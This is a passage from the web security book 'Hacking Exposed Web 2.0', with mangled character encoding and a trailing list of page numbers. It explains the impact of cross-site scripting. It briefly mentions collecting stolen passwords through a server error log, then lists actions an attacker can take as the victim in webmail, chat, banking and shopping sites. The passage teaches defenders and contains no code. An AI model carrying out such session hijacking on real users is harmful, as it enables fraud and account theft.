Thus, the
attacker does not even have to code the grabPasswords page because the requests will
be written to the web server??™s error log where it can be easily read.
Acting as the Victim
The greatest impact XSS has on web applications is that it allows the attacker to mimic
the user of the web application. Following are a few examples of what attackers can do
depending on the web application.
??? In a webmail application, an attacker can
??? send e-mails on the user??™s behalf
??? acquire the user??™s list of contacts
??? change automatic BCC properties (for example, the attacker can be
automatically BCCed to all new outgoing e-mails.)
??? change privacy/logging settings
46 Hacking Exposed Web 2.0
??? In a web-based instant messaging or chat application, an attacker can
??? acquire a list of contacts
??? send messages to contacts
??? add/remove contacts
??? In a web-based banking or ?¬? nancial system, an attacker can
??? transfer funds
??? apply for credit cards
??? change addresses
??? purchase checks
??? In an e-commerce site, an attacker can
??? purchase products
Whenever you are analyzing the impact of XSS on a site, imagine what an attacker
can do if he or she were able to take control of the victim??™s mouse and keyboard.
Pages:
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125